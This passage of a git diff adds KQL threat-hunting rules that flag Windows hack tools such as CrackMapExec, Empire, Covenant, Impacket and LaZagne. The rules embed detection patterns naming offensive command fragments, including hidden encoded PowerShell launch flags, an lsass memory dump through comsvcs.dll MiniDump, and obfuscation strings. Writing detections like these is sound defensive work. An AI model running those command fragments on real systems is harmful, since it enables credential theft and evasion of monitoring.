\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_covenant_powershell_launcher.kql b/KQL/rules/windows/process_creation/hacktool_covenant_powershell_launcher.kql
new file mode 100644
index 00000000..f458c6e7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_covenant_powershell_launcher.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Covenant PowerShell Launcher
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2020-06-04
+// Level: high
+// Description: Detects suspicious command lines used in Covenant luanchers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1564.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution.kql
new file mode 100644
index 00000000..a86b278f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.credential-access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution_patterns.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution_patterns.kql
new file mode 100644
index 00000000..bceef24b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution_patterns.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec Execution Patterns
+// Author: Thomas Patzke
+// Date: 2020-05-22
+// Level: high
+// Description: Detects various execution patterns of the CrackMapExec pentesting framework
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains " 2>&1") or ProcessCommandLine contains "powershell.exe -exec bypass -noni -nop -w 1 -C \"" or ProcessCommandLine contains "powershell.exe -noni -nop -w 1 -enc "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_crackmapexec_powershell_obfuscation.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_powershell_obfuscation.kql
new file mode 100644
index 00000000..633db41a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_crackmapexec_powershell_obfuscation.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec PowerShell Obfuscation
+// Author: Thomas Patzke
+// Date: 2020-05-22
+// Level: high
+// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027.005
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_crackmapexec_process_patterns.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_process_patterns.kql
new file mode 100644
index 00000000..8ba0548f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_crackmapexec_process_patterns.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec Process Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-12
+// Level: high
+// Description: Detects suspicious process patterns found in logs when CrackMapExec is used
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k ") and (ProcessCommandLine contains "tasklist /fi " and ProcessCommandLine contains "Imagename eq lsass.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) or (ProcessCommandLine contains "do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump" and ProcessCommandLine contains "\\Windows\\Temp\\" and ProcessCommandLine contains " full" and ProcessCommandLine contains "%%B") or (ProcessCommandLine contains "tasklist /v /fo csv" and ProcessCommandLine contains "findstr /i \"lsass\"")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_default_powersploit_empire_scheduled_task_creation.kql b/KQL/rules/windows/process_creation/hacktool_default_powersploit_empire_scheduled_task_creation.kql
new file mode 100644
index 00000000..62e06e69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_default_powersploit_empire_scheduled_task_creation.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Default PowerSploit/Empire Scheduled Task Creation
+// Author: Markus Neis, @Karneades
+// Date: 2018-03-06
+// Level: high
+// Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.g0022, attack.g0060, car.2013-08-001, attack.t1053.005, attack.t1059.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/SC ONLOGON" or ProcessCommandLine contains "/SC DAILY /ST" or ProcessCommandLine contains "/SC ONIDLE" or ProcessCommandLine contains "/SC HOURLY") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "powershell.exe -NonI" and ProcessCommandLine contains "/TN Updater /TR") and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_dinjector_powershell_cradle_execution.kql b/KQL/rules/windows/process_creation/hacktool_dinjector_powershell_cradle_execution.kql
new file mode 100644
index 00000000..c43dbd26
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_dinjector_powershell_cradle_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - DInjector PowerShell Cradle Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-07
+// Level: critical
+// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /am51" and ProcessCommandLine contains " /password"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_dumpert_process_dumper_execution.kql b/KQL/rules/windows/process_creation/hacktool_dumpert_process_dumper_execution.kql
new file mode 100644
index 00000000..42b6687c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_dumpert_process_dumper_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Dumpert Process Dumper Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-02-04
+// Level: critical
+// Description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Very unlikely
+
+DeviceProcessEvents
+| where MD5 startswith "09D278F9DE118EF09163C6140255C690" or ProcessCommandLine contains "Dumpert.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_edrsilencer_execution.kql b/KQL/rules/windows/process_creation/hacktool_edrsilencer_execution.kql
new file mode 100644
index 00000000..e22e42cd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_edrsilencer_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - EDRSilencer Execution
+// Author: @gott_cyber
+// Date: 2024-01-02
+// Level: high
+// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\EDRSilencer.exe" or ProcessVersionInfoOriginalFileName =~ "EDRSilencer.exe" or ProcessVersionInfoFileDescription contains "EDRSilencer"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_empire_powershell_launch_parameters.kql b/KQL/rules/windows/process_creation/hacktool_empire_powershell_launch_parameters.kql
new file mode 100644
index 00000000..10b139e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_empire_powershell_launch_parameters.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Empire PowerShell Launch Parameters
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-04-20
+// Level: high
+// Description: Detects suspicious powershell command line parameters used in Empire
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Other tools that incidentally use the same command line parameters
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -NoP -sta -NonI -W Hidden -Enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc " or ProcessCommandLine contains " -NoP -NonI -W Hidden -enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc" or ProcessCommandLine contains " -enc  SQB" or ProcessCommandLine contains " -nop -exec bypass -EncodedCommand "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_empire_powershell_uac_bypass.kql b/KQL/rules/windows/process_creation/hacktool_empire_powershell_uac_bypass.kql
new file mode 100644
index 00000000..aee6f0a8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_empire_powershell_uac_bypass.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Empire PowerShell UAC Bypass
+// Author: Ecco
+// Date: 2019-08-30
+// Level: critical
+// Description: Detects some Empire PowerShell UAC bypass methods
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_execution_pe_metadata.kql b/KQL/rules/windows/process_creation/hacktool_execution_pe_metadata.kql
new file mode 100644
index 00000000..0ef97169
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_execution_pe_metadata.kql
@@ -0,0 +1,12 @@
+// Title: Hacktool Execution - PE Metadata
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-27
+// Level: high
+// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.resource-development, attack.t1588.002, attack.t1003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessVersionInfoCompanyName =~ "Cube0x0"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_f_secure_c3_load_by_rundll32.kql b/KQL/rules/windows/process_creation/hacktool_f_secure_c3_load_by_rundll32.kql
new file mode 100644
index 00000000..65e034c6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_f_secure_c3_load_by_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - F-Secure C3 Load by Rundll32
+// Author: Alfie Champion (ajpc500)
+// Date: 2021-06-02
+// Level: critical
+// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains "StartNodeRelay"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_gmer_rootkit_detector_and_remover_execution.kql b/KQL/rules/windows/process_creation/hacktool_gmer_rootkit_detector_and_remover_execution.kql
new file mode 100644
index 00000000..aaa0de88
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_gmer_rootkit_detector_and_remover_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - GMER Rootkit Detector and Remover Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-05
+// Level: high
+// Description: Detects the execution GMER tool based on image and hash fields.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\gmer.exe" or (MD5 startswith "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 startswith "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 startswith "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_hashcat_password_cracker_execution.kql b/KQL/rules/windows/process_creation/hacktool_hashcat_password_cracker_execution.kql
new file mode 100644
index 00000000..d375b4e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_hashcat_password_cracker_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Hashcat Password Cracker Execution
+// Author: frack113
+// Date: 2021-12-27
+// Level: high
+// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1110.002
+// False Positives:
+//   - Tools that use similar command line flags and values
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-a " and ProcessCommandLine contains "-m 1000 " and ProcessCommandLine contains "-r ") or FolderPath endswith "\\hashcat.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_hollowreaper_execution.kql b/KQL/rules/windows/process_creation/hacktool_hollowreaper_execution.kql
new file mode 100644
index 00000000..0e972750
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_hollowreaper_execution.kql
@@ -0,0 +1,11 @@
+// Title: HackTool - HollowReaper Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-01
+// Level: high
+// Description: Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing.
+// It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012
+
+DeviceProcessEvents
+| where FolderPath endswith "\\HollowReaper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_htran_natbypass_execution.kql b/KQL/rules/windows/process_creation/hacktool_htran_natbypass_execution.kql
new file mode 100644
index 00000000..fc4713e6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_htran_natbypass_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Htran/NATBypass Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-12-27
+// Level: high
+// Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090, attack.s0040
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".exe -tran " or ProcessCommandLine contains ".exe -slave ") or (FolderPath endswith "\\htran.exe" or FolderPath endswith "\\lcx.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_hydra_password_bruteforce_execution.kql b/KQL/rules/windows/process_creation/hacktool_hydra_password_bruteforce_execution.kql
new file mode 100644
index 00000000..8de64364
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_hydra_password_bruteforce_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Hydra Password Bruteforce Execution
+// Author: Vasiliy Burov
+// Date: 2020-10-05
+// Level: high
+// Description: Detects command line parameters used by Hydra password guessing hack tool
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1110, attack.t1110.001
+// False Positives:
+//   - Software that uses the caret encased keywords PASS and USER in its command line
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "^USER^" or ProcessCommandLine contains "^PASS^") and (ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_impacket_tools_execution.kql b/KQL/rules/windows/process_creation/hacktool_impacket_tools_execution.kql
new file mode 100644
index 00000000..1bc4a784
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_impacket_tools_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Impacket Tools Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-24
+// Level: high
+// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001
+// False Positives:
+//   - Legitimate use of the impacket tools
+
+DeviceProcessEvents
+| where (FolderPath contains "\\goldenPac" or FolderPath contains "\\karmaSMB" or FolderPath contains "\\kintercept" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\rpcdump" or FolderPath contains "\\samrdump" or FolderPath contains "\\secretsdump" or FolderPath contains "\\smbexec" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\wmiexec" or FolderPath contains "\\wmipersist") or (FolderPath endswith "\\atexec_windows.exe" or FolderPath endswith "\\dcomexec_windows.exe" or FolderPath endswith "\\dpapi_windows.exe" or FolderPath endswith "\\findDelegation_windows.exe" or FolderPath endswith "\\GetADUsers_windows.exe" or FolderPath endswith "\\GetNPUsers_windows.exe" or FolderPath endswith "\\getPac_windows.exe" or FolderPath endswith "\\getST_windows.exe" or FolderPath endswith "\\getTGT_windows.exe" or FolderPath endswith "\\GetUserSPNs_windows.exe" or FolderPath endswith "\\ifmap_windows.exe" or FolderPath endswith "\\mimikatz_windows.exe" or FolderPath endswith "\\netview_windows.exe" or FolderPath endswith "\\nmapAnswerMachine_windows.exe" or FolderPath endswith "\\opdump_windows.exe" or FolderPath endswith "\\psexec_windows.exe" or FolderPath endswith "\\rdp_check_windows.exe" or FolderPath endswith "\\sambaPipe_windows.exe" or FolderPath endswith "\\smbclient_windows.exe" or FolderPath endswith "\\smbserver_windows.exe" or FolderPath endswith "\\sniff_windows.exe" or FolderPath endswith "\\sniffer_windows.exe" or FolderPath endswith "\\split_windows.exe" or FolderPath endswith "\\ticketer_windows.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_impersonate_execution.kql b/KQL/rules/windows/process_creation/hacktool_impersonate_execution.kql
new file mode 100644
index 00000000..d9676e34
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_impersonate_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Impersonate Execution
+// Author: Sai Prashanth Pulisetti @pulisettis
+// Date: 2022-12-21
+// Level: medium
+// Description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "impersonate.exe" and (ProcessCommandLine contains " list " or ProcessCommandLine contains " exec " or ProcessCommandLine contains " adduser ")) or (MD5 startswith "9520714AB576B0ED01D1513691377D01" or SHA256 startswith "E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_inveigh_execution.kql b/KQL/rules/windows/process_creation/hacktool_inveigh_execution.kql
new file mode 100644
index 00000000..22c86a54
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_inveigh_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Inveigh Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-24
+// Level: critical
+// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Very unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Inveigh.exe" or (ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")) or ProcessVersionInfoFileDescription =~ "Inveigh" or (ProcessCommandLine contains " -SpooferIP" or ProcessCommandLine contains " -ReplyToIPs " or ProcessCommandLine contains " -ReplyToDomains " or ProcessCommandLine contains " -ReplyToMACs " or ProcessCommandLine contains " -SnifferIP")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_jlaive_in_memory_assembly_execution.kql b/KQL/rules/windows/process_creation/hacktool_jlaive_in_memory_assembly_execution.kql
new file mode 100644
index 00000000..a5476d32
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_jlaive_in_memory_assembly_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Jlaive In-Memory Assembly Execution
+// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
+// Date: 2022-05-24
+// Level: medium
+// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine endswith ".bat" and InitiatingProcessFolderPath endswith "\\cmd.exe") and (((ProcessCommandLine contains "powershell.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "pwsh.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "+s" and ProcessCommandLine contains "+h" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\attrib.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_koadic_execution.kql b/KQL/rules/windows/process_creation/hacktool_koadic_execution.kql
new file mode 100644
index 00000000..2470610e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_koadic_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Koadic Execution
+// Author: wagga, Jonhnathan Ribeiro, oscd.community
+// Date: 2020-01-12
+// Level: high
+// Description: Detects command line parameters used by Koadic hack tool
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "chcp") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_krbrelay_execution.kql b/KQL/rules/windows/process_creation/hacktool_krbrelay_execution.kql
new file mode 100644
index 00000000..49d8fb86
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_krbrelay_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - KrbRelay Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-27
+// Level: high
+// Description: Detects the use of KrbRelay, a Kerberos relaying tool
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -spn " and ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -rbcd ") or (ProcessCommandLine contains "shadowcred" and ProcessCommandLine contains "clsid" and ProcessCommandLine contains "spn") or (ProcessCommandLine contains "spn " and ProcessCommandLine contains "session " and ProcessCommandLine contains "clsid ") or (FolderPath endswith "\\KrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_krbrelayup_execution.kql b/KQL/rules/windows/process_creation/hacktool_krbrelayup_execution.kql
new file mode 100644
index 00000000..98a34c4e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_krbrelayup_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - KrbRelayUp Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-26
+// Level: high
+// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1558.003, attack.lateral-movement, attack.t1550.003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_lazagne_execution.kql b/KQL/rules/windows/process_creation/hacktool_lazagne_execution.kql
new file mode 100644
index 00000000..1a421573
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_lazagne_execution.kql
@@ -0,0 +1,13 @@
+// Title: HackTool - LaZagne Execution
+// Author: Nasreddine Bencherchali, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2024-06-24
+// Level: medium
+// Description: Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer.
+// LaZagne has been leveraged multiple times by threat actors in order to dump credentials.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+// False Positives:
+//   - Some false positive is expected from tools with similar command line flags.
+
+DeviceProcessEvents
+| where (((ProcessCommandLine endswith ".exe all" or ProcessCommandLine endswith ".exe browsers" or ProcessCommandLine endswith ".exe chats" or ProcessCommandLine endswith ".exe databases" or ProcessCommandLine endswith ".exe games" or ProcessCommandLine endswith ".exe git" or ProcessCommandLine endswith ".exe mails" or ProcessCommandLine endswith ".exe maven" or ProcessCommandLine endswith ".exe memory" or ProcessCommandLine endswith ".exe multimedia" or ProcessCommandLine endswith ".exe sysadmin" or ProcessCommandLine endswith ".exe unused" or ProcessCommandLine endswith ".exe wifi" or ProcessCommandLine endswith ".exe windows") and (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Tmp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Photos\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\Saved Games\\" or FolderPath contains "\\Searches\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "\\Videos\\" or 